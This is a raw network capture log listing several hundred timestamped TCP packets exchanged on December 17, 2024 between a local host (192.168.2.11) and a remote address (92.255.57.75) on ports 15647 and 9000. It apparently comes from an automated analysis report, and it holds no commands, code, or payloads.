Dec 17, 2024 08:38:51.374547958 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:38:51.471035957 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:38:51.471107006 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:38:51.566607952 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:38:51.591120005 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:38:51.599634886 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:38:51.719382048 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:38:51.719552040 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:38:51.784934998 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:38:51.839296103 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:38:51.839400053 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:38:51.911742926 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:38:51.959300041 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:38:51.959482908 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:38:52.079207897 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:38:52.079478025 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:38:52.103811979 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:38:52.239953041 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:38:52.241717100 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:38:52.242010117 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:38:52.271624088 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:38:52.296390057 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:38:52.296631098 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:38:52.361947060 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:38:52.362008095 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:38:52.416476011 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:38:52.463723898 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:38:52.463901043 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:38:52.483396053 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:38:52.554122925 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:38:52.554397106 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:38:52.583825111 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:38:52.674058914 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:38:52.674159050 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:38:52.775991917 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:38:52.776170015 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:38:52.793889999 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:38:52.866996050 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:38:52.867116928 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:38:52.896441936 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:38:52.988274097 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:38:52.988408089 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:38:52.988706112 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:38:53.088496923 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:38:53.088576078 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:38:53.109486103 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:38:53.179142952 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:38:53.208282948 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:38:53.208400965 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:38:53.300621986 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:38:53.331207991 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:38:53.331331968 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:38:53.423345089 CET	49807	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:38:53.451225996 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:38:53.451355934 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:38:53.523662090 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:38:53.545571089 CET	9000	49807	92.255.57.75	192.168.2.11
Dec 17, 2024 08:38:53.545669079 CET	49807	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:38:53.571398020 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:38:53.571531057 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:38:53.643663883 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:38:53.691384077 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:38:53.716728926 CET	49808	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:38:53.757838011 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:38:53.761946917 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:38:53.835722923 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:38:53.836550951 CET	9000	49808	92.255.57.75	192.168.2.11
Dec 17, 2024 08:38:53.836642027 CET	49808	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:38:53.842899084 CET	49808	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:38:53.949958086 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:38:53.954438925 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:38:53.962732077 CET	9000	49808	92.255.57.75	192.168.2.11
Dec 17, 2024 08:38:53.992238045 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:38:54.028024912 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:38:54.110730886 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:38:54.112339020 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:38:54.127629042 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:38:54.219966888 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:38:54.247267962 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:38:54.272093058 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:38:54.391855955 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:38:54.426233053 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:38:54.433104038 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:38:54.584029913 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:38:54.584160089 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:38:54.745068073 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:38:54.745194912 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:38:54.896190882 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:38:54.896281004 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:38:55.057331085 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:38:55.057420015 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:38:55.162933111 CET	9000	49808	92.255.57.75	192.168.2.11
Dec 17, 2024 08:38:55.163078070 CET	9000	49808	92.255.57.75	192.168.2.11
Dec 17, 2024 08:38:55.163211107 CET	49808	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:38:55.163360119 CET	49808	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:38:55.208389997 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:38:55.208461046 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:38:55.267647982 CET	49814	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:38:55.283071041 CET	9000	49808	92.255.57.75	192.168.2.11
Dec 17, 2024 08:38:55.370315075 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:38:55.370346069 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:38:55.370475054 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:38:55.370475054 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:38:55.388070107 CET	9000	49814	92.255.57.75	192.168.2.11
Dec 17, 2024 08:38:55.388220072 CET	49814	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:38:55.388329029 CET	49814	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:38:55.490937948 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:38:55.491075993 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:38:55.508023977 CET	9000	49814	92.255.57.75	192.168.2.11
Dec 17, 2024 08:38:55.520730972 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:38:55.610609055 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:38:55.657586098 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:38:55.657902956 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:38:55.682653904 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:38:55.777798891 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:38:55.778165102 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:38:55.874691010 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:38:55.874846935 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:38:55.898016930 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:38:55.909998894 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:38:55.970098972 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:38:55.970213890 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:38:55.994723082 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:38:56.029911041 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:38:56.030080080 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:38:56.030133963 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:38:56.089993954 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:38:56.090085030 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:38:56.187094927 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:38:56.187773943 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:38:56.209959984 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:38:56.222239971 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:38:56.314177990 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:38:56.349514961 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:38:56.349636078 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:38:56.402106047 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:38:56.402254105 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:38:56.469566107 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:38:56.522530079 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:38:56.522650957 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:38:56.594274998 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:38:56.643378019 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:38:56.643712044 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:38:56.661942005 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:38:56.713579893 CET	9000	49814	92.255.57.75	192.168.2.11
Dec 17, 2024 08:38:56.713670015 CET	9000	49814	92.255.57.75	192.168.2.11
Dec 17, 2024 08:38:56.713785887 CET	49814	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:38:56.713825941 CET	49814	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:38:56.738792896 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:38:56.786603928 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:38:56.786730051 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:38:56.833206892 CET	49819	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:38:56.833570957 CET	9000	49814	92.255.57.75	192.168.2.11
Dec 17, 2024 08:38:56.953104019 CET	9000	49819	92.255.57.75	192.168.2.11
Dec 17, 2024 08:38:56.953236103 CET	49819	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:38:56.953349113 CET	49819	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:38:56.953419924 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:38:56.953594923 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:38:56.955729961 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:38:57.073080063 CET	9000	49819	92.255.57.75	192.168.2.11
Dec 17, 2024 08:38:57.073724985 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:38:57.073818922 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:38:57.098936081 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:38:57.204422951 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:38:57.237523079 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:38:57.237600088 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:38:57.266199112 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:38:57.291033983 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:38:57.291130066 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:38:57.357368946 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:38:57.411079884 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:38:57.411143064 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:38:57.459732056 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:38:57.501331091 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:38:57.530867100 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:38:57.530981064 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:38:57.549712896 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:38:57.549870968 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:38:57.693496943 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:38:57.693620920 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:38:57.723377943 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:38:57.723453999 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:38:57.813415051 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:38:57.843177080 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:38:57.843310118 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:38:57.901542902 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:38:57.915503025 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:38:57.963102102 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:38:57.963156939 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:38:58.083012104 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:38:58.083276987 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:38:58.153737068 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:38:58.203134060 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:38:58.203241110 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:38:58.275204897 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:38:58.279609919 CET	9000	49819	92.255.57.75	192.168.2.11
Dec 17, 2024 08:38:58.279783964 CET	9000	49819	92.255.57.75	192.168.2.11
Dec 17, 2024 08:38:58.281773090 CET	49819	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:38:58.291668892 CET	49819	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:38:58.323182106 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:38:58.323304892 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:38:58.345756054 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:38:58.411453962 CET	9000	49819	92.255.57.75	192.168.2.11
Dec 17, 2024 08:38:58.419393063 CET	49821	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:38:58.467307091 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:38:58.469746113 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:38:58.538139105 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:38:58.539201975 CET	9000	49821	92.255.57.75	192.168.2.11
Dec 17, 2024 08:38:58.541780949 CET	49821	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:38:58.563385963 CET	49821	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:38:58.572321892 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:38:58.659364939 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:38:58.683366060 CET	9000	49821	92.255.57.75	192.168.2.11
Dec 17, 2024 08:38:58.717622995 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:38:58.733491898 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:38:58.733544111 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:38:58.851613045 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:38:58.851682901 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:38:58.853419065 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:38:58.971438885 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:38:58.971486092 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:38:59.045658112 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:38:59.045736074 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:38:59.091774940 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:38:59.163754940 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:38:59.163832903 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:38:59.165498018 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:38:59.281599045 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:38:59.281869888 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:38:59.283726931 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:38:59.401669979 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:38:59.401724100 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:38:59.475924969 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:38:59.476074934 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:38:59.521555901 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:38:59.595791101 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:38:59.595932007 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:38:59.709764957 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:38:59.709877968 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:38:59.715759039 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:38:59.788146973 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:38:59.788322926 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:38:59.913115025 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:38:59.913219929 CET	9000	49821	92.255.57.75	192.168.2.11
Dec 17, 2024 08:38:59.913230896 CET	9000	49821	92.255.57.75	192.168.2.11
Dec 17, 2024 08:38:59.913255930 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:38:59.913264036 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:38:59.913290977 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:38:59.913324118 CET	49821	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:38:59.913465977 CET	49821	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:00.001318932 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:00.019159079 CET	49827	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:00.061203957 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:00.061213970 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:00.061248064 CET	9000	49821	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:00.061399937 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:00.153516054 CET	9000	49827	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:00.153729916 CET	49827	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:00.153729916 CET	49827	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:00.182068110 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:00.183716059 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:00.225541115 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:00.225718975 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:00.273523092 CET	9000	49827	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:00.303569078 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:00.345603943 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:00.345786095 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:00.374264002 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:00.423238993 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:00.509917021 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:00.510041952 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:00.537964106 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:00.539084911 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:00.629834890 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:00.658303976 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:00.658437967 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:00.709522009 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:00.778361082 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:00.779211044 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:00.822110891 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:00.876236916 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:00.899370909 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:00.899650097 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:00.970622063 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:01.016877890 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:01.019438982 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:01.019651890 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:01.057812929 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:01.111219883 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:01.139504910 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:01.162883043 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:01.200205088 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:01.249995947 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:01.250052929 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:01.354863882 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:01.354950905 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:01.413522005 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:01.474855900 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:01.475033998 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:01.478362083 CET	9000	49827	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:01.478491068 CET	9000	49827	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:01.478526115 CET	49827	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:01.478593111 CET	49827	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:01.512373924 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:01.563740015 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:01.594326019 CET	49832	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:01.598264933 CET	9000	49827	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:01.641416073 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:01.641547918 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:01.667143106 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:01.714101076 CET	9000	49832	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:01.714212894 CET	49832	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:01.714332104 CET	49832	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:01.719986916 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:01.761456966 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:01.761506081 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:01.787200928 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:01.787331104 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:01.834003925 CET	9000	49832	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:01.907075882 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:01.907195091 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:01.953906059 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:02.001251936 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:02.081542969 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:02.081598997 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:02.146102905 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:02.146193981 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:02.201411963 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:02.266032934 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:02.267971992 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:02.338216066 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:02.342235088 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:02.387706041 CET	15647	49796	92.255.57.75	192.168.2.11
